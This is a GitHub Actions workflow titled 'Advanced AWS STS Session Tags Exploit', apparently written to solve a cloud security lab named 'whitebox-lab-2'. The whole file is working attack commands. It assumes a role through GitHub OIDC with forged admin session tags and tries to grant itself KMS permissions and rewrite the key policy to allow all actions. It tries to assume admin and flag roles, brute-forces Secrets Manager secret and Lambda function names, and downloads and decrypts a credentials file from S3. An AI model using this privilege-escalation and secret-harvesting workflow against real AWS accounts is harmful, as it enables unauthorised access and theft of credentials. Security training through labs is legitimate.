name: Advanced AWS STS Session Tags Exploit

on:
  push:
    branches: [ main ]
  workflow_dispatch:

jobs:
  advanced-exploit:
    runs-on: ubuntu-latest
    permissions:
      id-token: write
      contents: read
    steps:
      - name: Checkout code
        uses: actions/checkout@v3

      - name: Configure AWS credentials with advanced session tags
        uses: aws-actions/configure-aws-credentials@v2
        with:
          role-to-assume: arn:aws:iam::067186171322:role/whitebox-lab-2-github-actions-role
          aws-region: us-east-1
          role-session-tags: |
            Key=PrincipalTag:Department,Value=Admin
            Key=PrincipalTag:Role,Value=Admin
            Key=PrincipalTag:Team,Value=Security
            Key=PrincipalTag:Project,Value=whitebox-lab-2
            Key=PrincipalTag:Environment,Value=prod
            Key=ResourceTag:Owner,Value=Admin
            Key=ResourceTag:Environment,Value=production
            Key=ResourceTag:Sensitive,Value=true
            Key=aws:RequestedRegion,Value=us-east-1
            Key=aws:userid,Value=Admin
            Key=github,Value=actions
            Key=lab,Value=whitebox-lab-2
            Key=flag,Value=true
            Key=access,Value=granted

      - name: Test session tag based resource access
        run: |
          echo "Testing resource access with enhanced session tags..."
          echo "Current identity:"
          aws sts get-caller-identity
          
          echo "Current session tags:"
          aws sts get-session-token --duration-seconds 900 || echo "Get session token failed"

      - name: Test KMS with advanced session tag combinations
        run: |
          echo "Testing KMS operations with advanced session tags..."
          
          # Test the known exposed KMS key
          aws kms describe-key --key-id arn:aws:kms:us-east-1:067186171322:key/1abf4a91-4a84-4395-b54c-43b6c6b60593 || echo "KMS describe failed"
          
          # Try to create grant with session tags
          aws kms create-grant \
            --key-id arn:aws:kms:us-east-1:067186171322:key/1abf4a91-4a84-4395-b54c-43b6c6b60593 \
            --grantee-principal arn:aws:iam::067186171322:role/whitebox-lab-2-github-actions-role \
            --operations Decrypt Encrypt GenerateDataKey DescribeKey CreateGrant \
            --name "github-actions-grant" || echo "KMS create-grant failed"
          
          # Try to modify key policy
          echo '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"AWS":"arn:aws:iam::067186171322:role/whitebox-lab-2-github-actions-role"},"Action":"kms:*","Resource":"*"}]}' > /tmp/new_policy.json
          aws kms put-key-policy \
            --key-id arn:aws:kms:us-east-1:067186171322:key/1abf4a91-4a84-4395-b54c-43b6c6b60593 \
            --policy-name default \
            --policy file:///tmp/new_policy.json || echo "KMS put-key-policy failed"

      - name: Test parameter store with session tags
        run: |
          echo "Testing Parameter Store access..."
          aws ssm get-parameters-by-path --path "/" --recursive || echo "SSM get-parameters failed"
          aws ssm get-parameter --name "flag_whitebox_lab_2" || echo "SSM get specific parameter failed"
          aws ssm get-parameter --name "/whitebox-lab-2/flag" || echo "SSM get path parameter failed"

      - name: Test IAM operations with session tags
        run: |
          echo "Testing IAM operations..."
          aws iam list-roles --max-items 10 || echo "IAM list-roles failed"
          aws iam get-role --role-name whitebox-lab-2-github-actions-role || echo "IAM get-role failed"
          aws iam list-attached-role-policies --role-name whitebox-lab-2-github-actions-role || echo "IAM list policies failed"

      - name: Test STS assume role with session tags
        run: |
          echo "Testing STS assume role operations..."
          # Try to assume other roles that might exist
          aws sts assume-role \
            --role-arn arn:aws:iam::067186171322:role/whitebox-lab-2-admin-role \
            --role-session-name github-actions-session \
            --tags Key=Department,Value=Admin Key=Role,Value=Admin \
            --duration-seconds 900 || echo "Assume admin role failed"
          
          aws sts assume-role \
            --role-arn arn:aws:iam::067186171322:role/whitebox-lab-2-flag-role \
            --role-session-name github-actions-session \
            --tags Key=flag,Value=true Key=access,Value=granted \
            --duration-seconds 900 || echo "Assume flag role failed"

      - name: Test CloudFormation and other management services
        run: |
          echo "Testing CloudFormation access..."
          aws cloudformation list-stacks || echo "CloudFormation list-stacks failed"
          aws cloudformation describe-stacks --stack-name whitebox-lab-2 || echo "CloudFormation describe specific stack failed"

      - name: Test EC2 and compute services
        run: |
          echo "Testing EC2 access..."
          aws ec2 describe-instances || echo "EC2 describe-instances failed"
          aws ec2 describe-security-groups || echo "EC2 describe-security-groups failed"
          aws ecs list-clusters || echo "ECS list-clusters failed"

      - name: Test encrypted data access
        run: |
          echo "Testing access to encrypted data..."
          # Try to download and decrypt the encrypted credentials found earlier
          aws s3 cp s3://whitebox-lab-2-public-bucket-ctf-776931e5d54e/db_creds.txt /tmp/creds.txt || echo "S3 download failed"
          
          # If KMS operations worked, try to decrypt data
          echo "Attempting to decrypt any base64 encoded data..."
          if [ -f /tmp/creds.txt ]; then
            cat /tmp/creds.txt
            # Try to decode if it's base64
            base64 -d /tmp/creds.txt > /tmp/decoded.bin 2>/dev/null || echo "Not base64 encoded"
            
            # Try to decrypt with KMS if we have access
            aws kms decrypt \
              --ciphertext-blob fileb:///tmp/decoded.bin \
              --key-id arn:aws:kms:us-east-1:067186171322:key/1abf4a91-4a84-4395-b54c-43b6c6b60593 \
              --output text --query Plaintext | base64 --decode || echo "KMS decrypt failed"
          fi

      - name: Final comprehensive resource test
        run: |
          echo "Final comprehensive test of all discovered resources..."
          
          # Test all possible secret names we've seen
          for secret in "flag_whitebox_lab_2_2" "whitebox-lab-2-flag" "github-flag" "admin-credentials" "db-credentials"; do
            aws secretsmanager get-secret-value --secret-id "$secret" || echo "Secret $secret failed"
          done
          
          # Test Lambda functions
          for func in "whitebox-lab-2-flag-function" "github-flag-function" "admin-function"; do
            aws lambda invoke --function-name "$func" /tmp/output-$func.json || echo "Lambda $func failed"
            cat /tmp/output-$func.json 2>/dev/null || echo "No output for $func"
          done
          
          # Test RDS clusters and instances
          aws rds describe-db-clusters || echo "RDS clusters failed"
          aws rds describe-db-instances || echo "RDS instances failed"
